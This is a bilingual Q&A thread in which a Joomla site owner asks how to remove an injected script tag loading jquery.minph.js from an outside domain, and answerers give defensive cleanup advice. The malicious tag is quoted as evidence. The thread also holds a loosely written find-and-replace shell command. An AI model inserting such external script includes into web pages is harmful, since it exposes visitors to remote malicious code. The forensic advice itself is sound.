Joomla恶意代码清除
这是我的网站。 http://ziggymonster.com/
最初它有4个受torjan感染的js文件和一些恶意代码。我已经清理了该文件。但现在我无法找到这个 javascript 包含。
<script src="http://boneraffyaho.cz.cc/jquery.minph.js"></script>
您可以通过查看页面源代码来查看。
它包含在每个末尾。它保持页面加载,扫描仪将其检测为恶意代码。
到目前为止我尝试过的事情。
1)改变了模板 2) 尝试禁用所有组件。 3) 尝试禁用所有组件。 4)尝试禁用所有插件。 5)下载完整站点并在完整站点中搜索此代码。但找不到。
但它仍然在那里。你能给我一些建议吗?
Here is my website.
http://ziggymonster.com/
At first it was having 4 torjan infected js files and some malicious code. I have cleaned that files. But now i am unable to find this javascript include.
<script src="http://boneraffyaho.cz.cc/jquery.minph.js"></script>
You can see by viewing source of page.
It is included at end of each. It keep page on loading and scanner detects it as malicious code.
The thing which i have tried so far.
1) Changed template
2) Try to disable all components.
3) try to disable all components.
4) tried to disable all plugins.
5) downloaded complete site and searched for this code in complete site. But could not find.
But it was still there. Can you give me some suggestions?
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(4)
即使禁用了 javascript,恶意代码仍然存在于页面中 - 这告诉我们它不是由其他 js 文件中的 document.write 写入的。
当我们使用 tmpl=component&no_html=1 设置访问站点时,该设置会抑制模板输出并仅发送组件的输出,代码仍然存在:
http://ziggymonster.com/?tmpl=component&no_html=1
这将非常强烈地指出代码已附加在网站根目录中主 Joomla index.php 文件的末尾。或者,模板自己的文件夹或 /templates/system/ 文件夹中的 component.php 文件可能是可行的候选者。
原位清理场地存在风险,但只要具备正确的知识、一些经验和正确的工具就可以完成。我建议找一位经验丰富的 Joomla 安全专家来这样做,或者重新构建网站的文件:在完全干净的文件夹中安装新的 Joomla(本地主机服务器最好),安装所有扩展,然后删除实时扩展站点,并将文件上传到您的网络空间,将文件绑定到原始数据库。
当然,恢复到几天前的备份将是最好的选择 - 您确实有备份,是吗?
您应该检查日志文件以了解攻击是如何实施的。您还应该更改所有密码,升级 Joomla 和所有附加组件 - 如果服务器上的另一个帐户看起来像提供了允许黑客进入的访问权限,请考虑更改网络主机。
祝您好运。
The malicious code is present within the page even when javascript is disabled - this tells us it isn't being written there by a document.write within other js files.
When we visit the site with the tmpl=component&no_html=1 settings which suppress template output and send only the component's output the code is still present:
http://ziggymonster.com/?tmpl=component&no_html=1
This would point quite strongly to the code having being appended at the end of the main Joomla index.php file in the root of your website. Alternatively the component.php file in your template's own folder or in the /templates/system/ folder may be viable candidates.
Cleansing a site in situ is risky - but can be done with the right knowledge, some experience and the right tools. I'd advise finding an experienced Joomla security expert to do so, or face re-building the site's files: install a fresh Joomla in a totally clean folder (localhost server would be best), install all of your extensions, then remove your live site, and upload the files to your web space tying the files to the original database.
Of course reverting to a backup from a few days ago would be the best option - you do have backups yes?
You should examine log files for an idea of how the attack was perpetrated. You should also change all passwords, upgrade Joomla and all add-ons - and consider changing web hosts if it looks like another account on the server provided access to allow the hackers in.
Good luck.
删除各种恶意代码的最快方法是通过 ssh 连接,打开您站点的目录并运行如下查询:
find 。 '*.*' -exec Replace 'HERE_IS_BAD_CODE' '' -- {} \;您还可以通过修改 *.php 或 *.php 上的 . 来过滤要搜索的文件类型。 html
免责声明:使用 ssh 时应该非常非常小心
the fastest way to remove all kinds of malicious code is to connect via ssh, open yous site's directory and to run a query like:
find . '*.*' -exec replace 'HERE_IS_BAD_CODE' '' -- {} \;you can aslo filter types of files to search in by modifying . on *.php or *.html
disclamer: you should be VERY VERY carefull with ssh
如果您熟悉 ssh,那么您可以使用以下命令:
它搜索包含危险代码的 php 文件(从当前目录递归)。黑客对 php 的本机邮件函数很感兴趣,但 eval 和套接字 api 函数也很感兴趣。我每天在我的服务器上运行此命令一次,它过去发现过恶意脚本。
If you're comfortable with ssh, then you can use this command:
Which searches for php files (recursively from the current directory) that contain dangerous code. php's native mail functions are of interest to hackers, but so to are eval and the socket api functions. I run this command on my server once a day, and it's found malicious scripts in the past.
为了真正确定,您需要重建您的网站。备份您的数据库和文件,然后从文档根目录中删除所有文件并从新副本重新上传(Joomla 来自 http://www .joomla.org/,来自其网站的扩展等)。然后,您需要重新上传媒体文件夹和任何自定义代码(模板等)。
如果您不太懂技术,则需要安装 Joomla 和扩展,然后删除数据库和
configuration.php,然后重新上传旧的configuration.php和数据库。否则你必须自己解压扩展。至少,我建议上传 Joomla 核心的新副本(您需要在执行此操作后立即删除“安装”目录)。这是非常安全的,因为发行版不会覆盖您的“configuration.php”。当然,如果您已经破解了 Joomla 核心(坏主意),那么您需要重新应用您的自定义破解。
检查您的安全措施也是个好主意 - 您的密码需要更改吗?您的所有文件都需要可由 Web 服务器写入吗?
To really be sure, you need to rebuild your site. Backup your database and files, then remove ALL files from the docroot and re-upload from fresh copies (Joomla from http://www.joomla.org/, extensions from their sites, etc). Then you'd re-upload your media folder and any custom code (template etc).
If you're not very technical, you'll want to install Joomla and the extensions, then delete the database and
configuration.php, and re-upload your oldconfiguration.phpand database. Otherwise you'll have to unpack the extensions yourself.At the very least, I would recommend uploading a new copy of Joomla core (you'll need to delete the 'installation' directory straight after you do so). This is pretty safe, as the distribution won't overwrite your 'configuration.php'. Of course, if you've hacked the Joomla core (Bad Idea), then you'll need to re-apply your custom hacks.
It'd also be a good idea to review your security measures - do your passwords need changing? Do all your files need to be writable by the web server?